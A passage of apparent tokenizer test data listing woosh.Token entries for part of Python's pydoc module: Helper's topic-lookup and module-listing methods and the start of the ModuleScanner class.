woosh.Token(woosh.INDENT, ' ', 2147, 0, 2147, 8),
woosh.Token(woosh.STRING, '"""Return unbuffered tuple of (topic, xrefs).\r\n\r\n If an error occurs here, the exception is caught and displayed by\r\n the url handler.\r\n\r\n This function duplicates the showtopic method but returns its\r\n result directly so it can be formatted for display in an html page.\r\n """', 2147, 8, 2154, 11),
woosh.Token(woosh.NEWLINE, '\r\n', 2154, 11, 2155, 0),
woosh.Token(woosh.NAME, 'try', 2155, 8, 2155, 11),
woosh.Token(woosh.OP, ':', 2155, 11, 2155, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 2155, 12, 2156, 0),
woosh.Token(woosh.INDENT, ' ', 2156, 0, 2156, 12),
woosh.Token(woosh.NAME, 'import', 2156, 12, 2156, 18),
woosh.Token(woosh.NAME, 'pydoc_data', 2156, 19, 2156, 29),
woosh.Token(woosh.OP, '.', 2156, 29, 2156, 30),
woosh.Token(woosh.NAME, 'topics', 2156, 30, 2156, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2156, 36, 2157, 0),
woosh.Token(woosh.DEDENT, ' ', 2157, 0, 2157, 8),
woosh.Token(woosh.NAME, 'except', 2157, 8, 2157, 14),
woosh.Token(woosh.NAME, 'ImportError', 2157, 15, 2157, 26),
woosh.Token(woosh.OP, ':', 2157, 26, 2157, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2157, 27, 2158, 0),
woosh.Token(woosh.INDENT, ' ', 2158, 0, 2158, 12),
woosh.Token(woosh.NAME, 'return', 2158, 12, 2158, 18),
woosh.Token(woosh.OP, '(', 2158, 18, 2158, 19),
woosh.Token(woosh.STRING, '\'\'\'\r\nSorry, topic and keyword documentation is not available because the\r\nmodule "pydoc_data.topics" could not be found.\r\n\'\'\'', 2158, 19, 2161, 3),
woosh.Token(woosh.OP, ',', 2161, 4, 2161, 5),
woosh.Token(woosh.STRING, "''", 2161, 6, 2161, 8),
woosh.Token(woosh.OP, ')', 2161, 8, 2161, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 2161, 9, 2162, 0),
woosh.Token(woosh.DEDENT, ' ', 2162, 0, 2162, 8),
woosh.Token(woosh.NAME, 'target', 2162, 8, 2162, 14),
woosh.Token(woosh.OP, '=', 2162, 15, 2162, 16),
woosh.Token(woosh.NAME, 'self', 2162, 17, 2162, 21),
woosh.Token(woosh.OP, '.', 2162, 21, 2162, 22),
woosh.Token(woosh.NAME, 'topics', 2162, 22, 2162, 28),
woosh.Token(woosh.OP, '.', 2162, 28, 2162, 29),
woosh.Token(woosh.NAME, 'get', 2162, 29, 2162, 32),
woosh.Token(woosh.OP, '(', 2162, 32, 2162, 33),
woosh.Token(woosh.NAME, 'topic', 2162, 33, 2162, 38),
woosh.Token(woosh.OP, ',', 2162, 38, 2162, 39),
woosh.Token(woosh.NAME, 'self', 2162, 40, 2162, 44),
woosh.Token(woosh.OP, '.', 2162, 44, 2162, 45),
woosh.Token(woosh.NAME, 'keywords', 2162, 45, 2162, 53),
woosh.Token(woosh.OP, '.', 2162, 53, 2162, 54),
woosh.Token(woosh.NAME, 'get', 2162, 54, 2162, 57),
woosh.Token(woosh.OP, '(', 2162, 57, 2162, 58),
woosh.Token(woosh.NAME, 'topic', 2162, 58, 2162, 63),
woosh.Token(woosh.OP, ')', 2162, 63, 2162, 64),
woosh.Token(woosh.OP, ')', 2162, 64, 2162, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 2162, 65, 2163, 0),
woosh.Token(woosh.NAME, 'if', 2163, 8, 2163, 10),
woosh.Token(woosh.NAME, 'not', 2163, 11, 2163, 14),
woosh.Token(woosh.NAME, 'target', 2163, 15, 2163, 21),
woosh.Token(woosh.OP, ':', 2163, 21, 2163, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2163, 22, 2164, 0),
woosh.Token(woosh.INDENT, ' ', 2164, 0, 2164, 12),
woosh.Token(woosh.NAME, 'raise', 2164, 12, 2164, 17),
woosh.Token(woosh.NAME, 'ValueError', 2164, 18, 2164, 28),
woosh.Token(woosh.OP, '(', 2164, 28, 2164, 29),
woosh.Token(woosh.STRING, "'could not find topic'", 2164, 29, 2164, 51),
woosh.Token(woosh.OP, ')', 2164, 51, 2164, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 2164, 52, 2165, 0),
woosh.Token(woosh.DEDENT, ' ', 2165, 0, 2165, 8),
woosh.Token(woosh.NAME, 'if', 2165, 8, 2165, 10),
woosh.Token(woosh.NAME, 'isinstance', 2165, 11, 2165, 21),
woosh.Token(woosh.OP, '(', 2165, 21, 2165, 22),
woosh.Token(woosh.NAME, 'target', 2165, 22, 2165, 28),
woosh.Token(woosh.OP, ',', 2165, 28, 2165, 29),
woosh.Token(woosh.NAME, 'str', 2165, 30, 2165, 33),
woosh.Token(woosh.OP, ')', 2165, 33, 2165, 34),
woosh.Token(woosh.OP, ':', 2165, 34, 2165, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2165, 35, 2166, 0),
woosh.Token(woosh.INDENT, ' ', 2166, 0, 2166, 12),
woosh.Token(woosh.NAME, 'return', 2166, 12, 2166, 18),
woosh.Token(woosh.NAME, 'self', 2166, 19, 2166, 23),
woosh.Token(woosh.OP, '.', 2166, 23, 2166, 24),
woosh.Token(woosh.NAME, '_gettopic', 2166, 24, 2166, 33),
woosh.Token(woosh.OP, '(', 2166, 33, 2166, 34),
woosh.Token(woosh.NAME, 'target', 2166, 34, 2166, 40),
woosh.Token(woosh.OP, ',', 2166, 40, 2166, 41),
woosh.Token(woosh.NAME, 'more_xrefs', 2166, 42, 2166, 52),
woosh.Token(woosh.OP, ')', 2166, 52, 2166, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2166, 53, 2167, 0),
woosh.Token(woosh.DEDENT, ' ', 2167, 0, 2167, 8),
woosh.Token(woosh.NAME, 'label', 2167, 8, 2167, 13),
woosh.Token(woosh.OP, ',', 2167, 13, 2167, 14),
woosh.Token(woosh.NAME, 'xrefs', 2167, 15, 2167, 20),
woosh.Token(woosh.OP, '=', 2167, 21, 2167, 22),
woosh.Token(woosh.NAME, 'target', 2167, 23, 2167, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2167, 29, 2168, 0),
woosh.Token(woosh.NAME, 'doc', 2168, 8, 2168, 11),
woosh.Token(woosh.OP, '=', 2168, 12, 2168, 13),
woosh.Token(woosh.NAME, 'pydoc_data', 2168, 14, 2168, 24),
woosh.Token(woosh.OP, '.', 2168, 24, 2168, 25),
woosh.Token(woosh.NAME, 'topics', 2168, 25, 2168, 31),
woosh.Token(woosh.OP, '.', 2168, 31, 2168, 32),
woosh.Token(woosh.NAME, 'topics', 2168, 32, 2168, 38),
woosh.Token(woosh.OP, '[', 2168, 38, 2168, 39),
woosh.Token(woosh.NAME, 'label', 2168, 39, 2168, 44),
woosh.Token(woosh.OP, ']', 2168, 44, 2168, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 2168, 45, 2169, 0),
woosh.Token(woosh.NAME, 'if', 2169, 8, 2169, 10),
woosh.Token(woosh.NAME, 'more_xrefs', 2169, 11, 2169, 21),
woosh.Token(woosh.OP, ':', 2169, 21, 2169, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2169, 22, 2170, 0),
woosh.Token(woosh.INDENT, ' ', 2170, 0, 2170, 12),
woosh.Token(woosh.NAME, 'xrefs', 2170, 12, 2170, 17),
woosh.Token(woosh.OP, '=', 2170, 18, 2170, 19),
woosh.Token(woosh.OP, '(', 2170, 20, 2170, 21),
woosh.Token(woosh.NAME, 'xrefs', 2170, 21, 2170, 26),
woosh.Token(woosh.NAME, 'or', 2170, 27, 2170, 29),
woosh.Token(woosh.STRING, "''", 2170, 30, 2170, 32),
woosh.Token(woosh.OP, ')', 2170, 32, 2170, 33),
woosh.Token(woosh.OP, '+', 2170, 34, 2170, 35),
woosh.Token(woosh.STRING, "' '", 2170, 36, 2170, 39),
woosh.Token(woosh.OP, '+', 2170, 40, 2170, 41),
woosh.Token(woosh.NAME, 'more_xrefs', 2170, 42, 2170, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 2170, 52, 2171, 0),
woosh.Token(woosh.DEDENT, ' ', 2171, 0, 2171, 8),
woosh.Token(woosh.NAME, 'return', 2171, 8, 2171, 14),
woosh.Token(woosh.NAME, 'doc', 2171, 15, 2171, 18),
woosh.Token(woosh.OP, ',', 2171, 18, 2171, 19),
woosh.Token(woosh.NAME, 'xrefs', 2171, 20, 2171, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2171, 25, 2172, 0),
woosh.Token(woosh.DEDENT, ' ', 2173, 0, 2173, 4),
woosh.Token(woosh.NAME, 'def', 2173, 4, 2173, 7),
woosh.Token(woosh.NAME, 'showsymbol', 2173, 8, 2173, 18),
woosh.Token(woosh.OP, '(', 2173, 18, 2173, 19),
woosh.Token(woosh.NAME, 'self', 2173, 19, 2173, 23),
woosh.Token(woosh.OP, ',', 2173, 23, 2173, 24),
woosh.Token(woosh.NAME, 'symbol', 2173, 25, 2173, 31),
woosh.Token(woosh.OP, ')', 2173, 31, 2173, 32),
woosh.Token(woosh.OP, ':', 2173, 32, 2173, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2173, 33, 2174, 0),
woosh.Token(woosh.INDENT, ' ', 2174, 0, 2174, 8),
woosh.Token(woosh.NAME, 'target', 2174, 8, 2174, 14),
woosh.Token(woosh.OP, '=', 2174, 15, 2174, 16),
woosh.Token(woosh.NAME, 'self', 2174, 17, 2174, 21),
woosh.Token(woosh.OP, '.', 2174, 21, 2174, 22),
woosh.Token(woosh.NAME, 'symbols', 2174, 22, 2174, 29),
woosh.Token(woosh.OP, '[', 2174, 29, 2174, 30),
woosh.Token(woosh.NAME, 'symbol', 2174, 30, 2174, 36),
woosh.Token(woosh.OP, ']', 2174, 36, 2174, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2174, 37, 2175, 0),
woosh.Token(woosh.NAME, 'topic', 2175, 8, 2175, 13),
woosh.Token(woosh.OP, ',', 2175, 13, 2175, 14),
woosh.Token(woosh.NAME, '_', 2175, 15, 2175, 16),
woosh.Token(woosh.OP, ',', 2175, 16, 2175, 17),
woosh.Token(woosh.NAME, 'xrefs', 2175, 18, 2175, 23),
woosh.Token(woosh.OP, '=', 2175, 24, 2175, 25),
woosh.Token(woosh.NAME, 'target', 2175, 26, 2175, 32),
woosh.Token(woosh.OP, '.', 2175, 32, 2175, 33),
woosh.Token(woosh.NAME, 'partition', 2175, 33, 2175, 42),
woosh.Token(woosh.OP, '(', 2175, 42, 2175, 43),
woosh.Token(woosh.STRING, "' '", 2175, 43, 2175, 46),
woosh.Token(woosh.OP, ')', 2175, 46, 2175, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 2175, 47, 2176, 0),
woosh.Token(woosh.NAME, 'self', 2176, 8, 2176, 12),
woosh.Token(woosh.OP, '.', 2176, 12, 2176, 13),
woosh.Token(woosh.NAME, 'showtopic', 2176, 13, 2176, 22),
woosh.Token(woosh.OP, '(', 2176, 22, 2176, 23),
woosh.Token(woosh.NAME, 'topic', 2176, 23, 2176, 28),
woosh.Token(woosh.OP, ',', 2176, 28, 2176, 29),
woosh.Token(woosh.NAME, 'xrefs', 2176, 30, 2176, 35),
woosh.Token(woosh.OP, ')', 2176, 35, 2176, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2176, 36, 2177, 0),
woosh.Token(woosh.DEDENT, ' ', 2178, 0, 2178, 4),
woosh.Token(woosh.NAME, 'def', 2178, 4, 2178, 7),
woosh.Token(woosh.NAME, 'listmodules', 2178, 8, 2178, 19),
woosh.Token(woosh.OP, '(', 2178, 19, 2178, 20),
woosh.Token(woosh.NAME, 'self', 2178, 20, 2178, 24),
woosh.Token(woosh.OP, ',', 2178, 24, 2178, 25),
woosh.Token(woosh.NAME, 'key', 2178, 26, 2178, 29),
woosh.Token(woosh.OP, '=', 2178, 29, 2178, 30),
woosh.Token(woosh.STRING, "''", 2178, 30, 2178, 32),
woosh.Token(woosh.OP, ')', 2178, 32, 2178, 33),
woosh.Token(woosh.OP, ':', 2178, 33, 2178, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2178, 34, 2179, 0),
woosh.Token(woosh.INDENT, ' ', 2179, 0, 2179, 8),
woosh.Token(woosh.NAME, 'if', 2179, 8, 2179, 10),
woosh.Token(woosh.NAME, 'key', 2179, 11, 2179, 14),
woosh.Token(woosh.OP, ':', 2179, 14, 2179, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 2179, 15, 2180, 0),
woosh.Token(woosh.INDENT, ' ', 2180, 0, 2180, 12),
woosh.Token(woosh.NAME, 'self', 2180, 12, 2180, 16),
woosh.Token(woosh.OP, '.', 2180, 16, 2180, 17),
woosh.Token(woosh.NAME, 'output', 2180, 17, 2180, 23),
woosh.Token(woosh.OP, '.', 2180, 23, 2180, 24),
woosh.Token(woosh.NAME, 'write', 2180, 24, 2180, 29),
woosh.Token(woosh.OP, '(', 2180, 29, 2180, 30),
woosh.Token(woosh.STRING, "'''\r\nHere is a list of modules whose name or summary contains '{}'.\r\nIf there are any, enter a module name to get more help.\r\n\r\n'''", 2180, 30, 2184, 3),
woosh.Token(woosh.OP, '.', 2184, 3, 2184, 4),
woosh.Token(woosh.NAME, 'format', 2184, 4, 2184, 10),
woosh.Token(woosh.OP, '(', 2184, 10, 2184, 11),
woosh.Token(woosh.NAME, 'key', 2184, 11, 2184, 14),
woosh.Token(woosh.OP, ')', 2184, 14, 2184, 15),
woosh.Token(woosh.OP, ')', 2184, 15, 2184, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 2184, 16, 2185, 0),
woosh.Token(woosh.NAME, 'apropos', 2185, 12, 2185, 19),
woosh.Token(woosh.OP, '(', 2185, 19, 2185, 20),
woosh.Token(woosh.NAME, 'key', 2185, 20, 2185, 23),
woosh.Token(woosh.OP, ')', 2185, 23, 2185, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2185, 24, 2186, 0),
woosh.Token(woosh.DEDENT, ' ', 2186, 0, 2186, 8),
woosh.Token(woosh.NAME, 'else', 2186, 8, 2186, 12),
woosh.Token(woosh.OP, ':', 2186, 12, 2186, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 2186, 13, 2187, 0),
woosh.Token(woosh.INDENT, ' ', 2187, 0, 2187, 12),
woosh.Token(woosh.NAME, 'self', 2187, 12, 2187, 16),
woosh.Token(woosh.OP, '.', 2187, 16, 2187, 17),
woosh.Token(woosh.NAME, 'output', 2187, 17, 2187, 23),
woosh.Token(woosh.OP, '.', 2187, 23, 2187, 24),
woosh.Token(woosh.NAME, 'write', 2187, 24, 2187, 29),
woosh.Token(woosh.OP, '(', 2187, 29, 2187, 30),
woosh.Token(woosh.STRING, "'''\r\nPlease wait a moment while I gather a list of all available modules...\r\n\r\n'''", 2187, 30, 2190, 3),
woosh.Token(woosh.OP, ')', 2190, 3, 2190, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 2190, 4, 2191, 0),
woosh.Token(woosh.NAME, 'modules', 2191, 12, 2191, 19),
woosh.Token(woosh.OP, '=', 2191, 20, 2191, 21),
woosh.Token(woosh.OP, '{', 2191, 22, 2191, 23),
woosh.Token(woosh.OP, '}', 2191, 23, 2191, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2191, 24, 2192, 0),
woosh.Token(woosh.NAME, 'def', 2192, 12, 2192, 15),
woosh.Token(woosh.NAME, 'callback', 2192, 16, 2192, 24),
woosh.Token(woosh.OP, '(', 2192, 24, 2192, 25),
woosh.Token(woosh.NAME, 'path', 2192, 25, 2192, 29),
woosh.Token(woosh.OP, ',', 2192, 29, 2192, 30),
woosh.Token(woosh.NAME, 'modname', 2192, 31, 2192, 38),
woosh.Token(woosh.OP, ',', 2192, 38, 2192, 39),
woosh.Token(woosh.NAME, 'desc', 2192, 40, 2192, 44),
woosh.Token(woosh.OP, ',', 2192, 44, 2192, 45),
woosh.Token(woosh.NAME, 'modules', 2192, 46, 2192, 53),
woosh.Token(woosh.OP, '=', 2192, 53, 2192, 54),
woosh.Token(woosh.NAME, 'modules', 2192, 54, 2192, 61),
woosh.Token(woosh.OP, ')', 2192, 61, 2192, 62),
woosh.Token(woosh.OP, ':', 2192, 62, 2192, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 2192, 63, 2193, 0),
woosh.Token(woosh.INDENT, ' ', 2193, 0, 2193, 16),
woosh.Token(woosh.NAME, 'if', 2193, 16, 2193, 18),
woosh.Token(woosh.NAME, 'modname', 2193, 19, 2193, 26),
woosh.Token(woosh.NAME, 'and', 2193, 27, 2193, 30),
woosh.Token(woosh.NAME, 'modname', 2193, 31, 2193, 38),
woosh.Token(woosh.OP, '[', 2193, 38, 2193, 39),
woosh.Token(woosh.OP, '-', 2193, 39, 2193, 40),
woosh.Token(woosh.NUMBER, '9', 2193, 40, 2193, 41),
woosh.Token(woosh.OP, ':', 2193, 41, 2193, 42),
woosh.Token(woosh.OP, ']', 2193, 42, 2193, 43),
woosh.Token(woosh.OP, '==', 2193, 44, 2193, 46),
woosh.Token(woosh.STRING, "'.__init__'", 2193, 47, 2193, 58),
woosh.Token(woosh.OP, ':', 2193, 58, 2193, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 2193, 59, 2194, 0),
woosh.Token(woosh.INDENT, ' ', 2194, 0, 2194, 20),
woosh.Token(woosh.NAME, 'modname', 2194, 20, 2194, 27),
woosh.Token(woosh.OP, '=', 2194, 28, 2194, 29),
woosh.Token(woosh.NAME, 'modname', 2194, 30, 2194, 37),
woosh.Token(woosh.OP, '[', 2194, 37, 2194, 38),
woosh.Token(woosh.OP, ':', 2194, 38, 2194, 39),
woosh.Token(woosh.OP, '-', 2194, 39, 2194, 40),
woosh.Token(woosh.NUMBER, '9', 2194, 40, 2194, 41),
woosh.Token(woosh.OP, ']', 2194, 41, 2194, 42),
woosh.Token(woosh.OP, '+', 2194, 43, 2194, 44),
woosh.Token(woosh.STRING, "' (package)'", 2194, 45, 2194, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2194, 57, 2195, 0),
woosh.Token(woosh.DEDENT, ' ', 2195, 0, 2195, 16),
woosh.Token(woosh.NAME, 'if', 2195, 16, 2195, 18),
woosh.Token(woosh.NAME, 'modname', 2195, 19, 2195, 26),
woosh.Token(woosh.OP, '.', 2195, 26, 2195, 27),
woosh.Token(woosh.NAME, 'find', 2195, 27, 2195, 31),
woosh.Token(woosh.OP, '(', 2195, 31, 2195, 32),
woosh.Token(woosh.STRING, "'.'", 2195, 32, 2195, 35),
woosh.Token(woosh.OP, ')', 2195, 35, 2195, 36),
woosh.Token(woosh.OP, '<', 2195, 37, 2195, 38),
woosh.Token(woosh.NUMBER, '0', 2195, 39, 2195, 40),
woosh.Token(woosh.OP, ':', 2195, 40, 2195, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2195, 41, 2196, 0),
woosh.Token(woosh.INDENT, ' ', 2196, 0, 2196, 20),
woosh.Token(woosh.NAME, 'modules', 2196, 20, 2196, 27),
woosh.Token(woosh.OP, '[', 2196, 27, 2196, 28),
woosh.Token(woosh.NAME, 'modname', 2196, 28, 2196, 35),
woosh.Token(woosh.OP, ']', 2196, 35, 2196, 36),
woosh.Token(woosh.OP, '=', 2196, 37, 2196, 38),
woosh.Token(woosh.NUMBER, '1', 2196, 39, 2196, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 2196, 40, 2197, 0),
woosh.Token(woosh.DEDENT, ' ', 2197, 0, 2197, 12),
woosh.Token(woosh.DEDENT, '', 2197, 12, 2197, 12),
woosh.Token(woosh.NAME, 'def', 2197, 12, 2197, 15),
woosh.Token(woosh.NAME, 'onerror', 2197, 16, 2197, 23),
woosh.Token(woosh.OP, '(', 2197, 23, 2197, 24),
woosh.Token(woosh.NAME, 'modname', 2197, 24, 2197, 31),
woosh.Token(woosh.OP, ')', 2197, 31, 2197, 32),
woosh.Token(woosh.OP, ':', 2197, 32, 2197, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2197, 33, 2198, 0),
woosh.Token(woosh.INDENT, ' ', 2198, 0, 2198, 16),
woosh.Token(woosh.NAME, 'callback', 2198, 16, 2198, 24),
woosh.Token(woosh.OP, '(', 2198, 24, 2198, 25),
woosh.Token(woosh.NAME, 'None', 2198, 25, 2198, 29),
woosh.Token(woosh.OP, ',', 2198, 29, 2198, 30),
woosh.Token(woosh.NAME, 'modname', 2198, 31, 2198, 38),
woosh.Token(woosh.OP, ',', 2198, 38, 2198, 39),
woosh.Token(woosh.NAME, 'None', 2198, 40, 2198, 44),
woosh.Token(woosh.OP, ')', 2198, 44, 2198, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 2198, 45, 2199, 0),
woosh.Token(woosh.DEDENT, ' ', 2199, 0, 2199, 12),
woosh.Token(woosh.NAME, 'ModuleScanner', 2199, 12, 2199, 25),
woosh.Token(woosh.OP, '(', 2199, 25, 2199, 26),
woosh.Token(woosh.OP, ')', 2199, 26, 2199, 27),
woosh.Token(woosh.OP, '.', 2199, 27, 2199, 28),
woosh.Token(woosh.NAME, 'run', 2199, 28, 2199, 31),
woosh.Token(woosh.OP, '(', 2199, 31, 2199, 32),
woosh.Token(woosh.NAME, 'callback', 2199, 32, 2199, 40),
woosh.Token(woosh.OP, ',', 2199, 40, 2199, 41),
woosh.Token(woosh.NAME, 'onerror', 2199, 42, 2199, 49),
woosh.Token(woosh.OP, '=', 2199, 49, 2199, 50),
woosh.Token(woosh.NAME, 'onerror', 2199, 50, 2199, 57),
woosh.Token(woosh.OP, ')', 2199, 57, 2199, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 2199, 58, 2200, 0),
woosh.Token(woosh.NAME, 'self', 2200, 12, 2200, 16),
woosh.Token(woosh.OP, '.', 2200, 16, 2200, 17),
woosh.Token(woosh.NAME, 'list', 2200, 17, 2200, 21),
woosh.Token(woosh.OP, '(', 2200, 21, 2200, 22),
woosh.Token(woosh.NAME, 'modules', 2200, 22, 2200, 29),
woosh.Token(woosh.OP, '.', 2200, 29, 2200, 30),
woosh.Token(woosh.NAME, 'keys', 2200, 30, 2200, 34),
woosh.Token(woosh.OP, '(', 2200, 34, 2200, 35),
woosh.Token(woosh.OP, ')', 2200, 35, 2200, 36),
woosh.Token(woosh.OP, ')', 2200, 36, 2200, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2200, 37, 2201, 0),
woosh.Token(woosh.NAME, 'self', 2201, 12, 2201, 16),
woosh.Token(woosh.OP, '.', 2201, 16, 2201, 17),
woosh.Token(woosh.NAME, 'output', 2201, 17, 2201, 23),
woosh.Token(woosh.OP, '.', 2201, 23, 2201, 24),
woosh.Token(woosh.NAME, 'write', 2201, 24, 2201, 29),
woosh.Token(woosh.OP, '(', 2201, 29, 2201, 30),
woosh.Token(woosh.STRING, '\'\'\'\r\nEnter any module name to get more help. Or, type "modules spam" to search\r\nfor modules whose name or summary contain the string "spam".\r\n\'\'\'', 2201, 30, 2204, 3),
woosh.Token(woosh.OP, ')', 2204, 3, 2204, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 2204, 4, 2205, 0),
woosh.Token(woosh.DEDENT, '', 2206, 0, 2206, 0),
woosh.Token(woosh.DEDENT, '', 2206, 0, 2206, 0),
woosh.Token(woosh.DEDENT, '', 2206, 0, 2206, 0),
woosh.Token(woosh.NAME, 'help', 2206, 0, 2206, 4),
woosh.Token(woosh.OP, '=', 2206, 5, 2206, 6),
woosh.Token(woosh.NAME, 'Helper', 2206, 7, 2206, 13),
woosh.Token(woosh.OP, '(', 2206, 13, 2206, 14),
woosh.Token(woosh.OP, ')', 2206, 14, 2206, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 2206, 15, 2207, 0),
woosh.Token(woosh.NAME, 'class', 2208, 0, 2208, 5),
woosh.Token(woosh.NAME, 'ModuleScanner', 2208, 6, 2208, 19),
woosh.Token(woosh.OP, ':', 2208, 19, 2208, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 2208, 20, 2209, 0),
woosh.Token(woosh.INDENT, ' ', 2209, 0, 2209, 4),
woosh.Token(woosh.STRING, '"""An interruptible scanner that searches module synopses."""', 2209, 4, 2209, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 2209, 65, 2210, 0),
woosh.Token(woosh.NAME, 'def', 2211, 4, 2211, 7),
woosh.Token(woosh.NAME, 'run', 2211, 8, 2211, 11),
woosh.Token(woosh.OP, '(', 2211, 11, 2211, 12),
woosh.Token(woosh.NAME, 'self', 2211, 12, 2211, 16),
woosh.Token(woosh.OP, ',', 2211, 16, 2211, 17),
woosh.Token(woosh.NAME, 'callback', 2211, 18, 2211, 26),
woosh.Token(woosh.OP, ',', 2211, 26, 2211, 27),
woosh.Token(woosh.NAME, 'key', 2211, 28, 2211, 31),
woosh.Token(woosh.OP, '=', 2211, 31, 2211, 32),
woosh.Token(woosh.NAME, 'None', 2211, 32, 2211, 36),
woosh.Token(woosh.OP, ',', 2211, 36, 2211, 37),
woosh.Token(woosh.NAME, 'completer', 2211, 38, 2211, 47),
woosh.Token(woosh.OP, '=', 2211, 47, 2211, 48),
woosh.Token(woosh.NAME, 'None', 2211, 48, 2211, 52),
woosh.Token(woosh.OP, ',', 2211, 52, 2211, 53),
woosh.Token(woosh.NAME, 'onerror', 2211, 54, 2211, 61),
woosh.Token(woosh.OP, '=', 2211, 61, 2211, 62),
woosh.Token(woosh.NAME, 'None', 2211, 62, 2211, 66),
woosh.Token(woosh.OP, ')', 2211, 66, 2211, 67),
woosh.Token(woosh.OP, ':', 2211, 67, 2211, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 2211, 68, 2212, 0),
woosh.Token(woosh.INDENT, ' ', 2212, 0, 2212, 8),
woosh.Token(woosh.NAME, 'if', 2212, 8, 2212, 10),
woosh.Token(woosh.NAME, 'key', 2212, 11, 2212, 14),
woosh.Token(woosh.OP, ':', 2212, 14, 2212, 15),
woosh.Token(woosh.NAME, 'key', 2212, 16, 2212, 19),
woosh.Token(woosh.OP, '=', 2212, 20, 2212, 21),
woosh.Token(woosh.NAME, 'key', 2212, 22, 2212, 25),
woosh.Token(woosh.OP, '.', 2212, 25, 2212, 26),
woosh.Token(woosh.NAME, 'lower', 2212, 26, 2212, 31),
woosh.Token(woosh.OP, '(', 2212, 31, 2212, 32),
woosh.Token(woosh.OP, ')', 2212, 32, 2212, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2212, 33, 2213, 0),
woosh.Token(woosh.NAME, 'self', 2213, 8, 2213, 12),
woosh.Token(woosh.OP, '.', 2213, 12, 2213, 13),
woosh.Token(woosh.NAME, 'quit', 2213, 13, 2213, 17),
woosh.Token(woosh.OP, '=', 2213, 18, 2213, 19),
woosh.Token(woosh.NAME, 'False', 2213, 20, 2213, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2213, 25, 2214, 0),
woosh.Token(woosh.NAME, 'seen', 2214, 8, 2214, 12),
woosh.Token(woosh.OP, '=', 2214, 13, 2214, 14),
woosh.Token(woosh.OP, '{', 2214, 15, 2214, 16),
woosh.Token(woosh.OP, '}', 2214, 16, 2214, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2214, 17, 2215, 0),
woosh.Token(woosh.NAME, 'for', 2216, 8, 2216, 11),
woosh.Token(woosh.NAME, 'modname', 2216, 12, 2216, 19),
woosh.Token(woosh.NAME, 'in', 2216, 20, 2216, 22),
woosh.Token(woosh.NAME, 'sys', 2216, 23, 2216, 26),
woosh.Token(woosh.OP, '.', 2216, 26, 2216, 27),
woosh.Token(woosh.NAME, 'builtin_module_names', 2216, 27, 2216, 47),
woosh.Token(woosh.OP, ':', 2216, 47, 2216, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 2216, 48, 2217, 0),
woosh.Token(woosh.INDENT, ' ', 2217, 0, 2217, 12),
woosh.Token(woosh.NAME, 'if', 2217, 12, 2217, 14),
woosh.Token(woosh.NAME, 'modname', 2217, 15, 2217, 22),
woosh.Token(woosh.OP, '!=', 2217, 23, 2217, 25),
woosh.Token(woosh.STRING, "'__main__'", 2217, 26, 2217, 36),
woosh.Token(woosh.OP, ':', 2217, 36, 2217, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2217, 37, 2218, 0),
woosh.Token(woosh.INDENT, ' ', 2218, 0, 2218, 16),
woosh.Token(woosh.NAME, 'seen', 2218, 16, 2218, 20),
woosh.Token(woosh.OP, '[', 2218, 20, 2218, 21),
woosh.Token(woosh.NAME, 'modname', 2218, 21, 2218, 28),
woosh.Token(woosh.OP, ']', 2218, 28, 2218, 29),
woosh.Token(woosh.OP, '=', 2218, 30, 2218, 31),
woosh.Token(woosh.NUMBER, '1', 2218, 32, 2218, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2218, 33, 2219, 0),
woosh.Token(woosh.NAME, 'if', 2219, 16, 2219, 18),
woosh.Token(woosh.NAME, 'key', 2219, 19, 2219, 22),
woosh.Token(woosh.NAME, 'is', 2219, 23, 2219, 25),
woosh.Token(woosh.NAME, 'None', 2219, 26, 2219, 30),
woosh.Token(woosh.OP, ':', 2219, 30, 2219, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2219, 31, 2220, 0),
woosh.Token(woosh.INDENT, ' ', 2220, 0, 2220, 20),
woosh.Token(woosh.NAME, 'callback', 2220, 20, 2220, 28),
woosh.Token(woosh.OP, '(', 2220, 28, 2220, 29),
woosh.Token(woosh.NAME, 'None', 2220, 29, 2220, 33),
woosh.Token(woosh.OP, ',', 2220, 33, 2220, 34),
woosh.Token(woosh.NAME, 'modname', 2220, 35, 2220, 42),
woosh.Token(woosh.OP, ',', 2220, 42, 2220, 43),
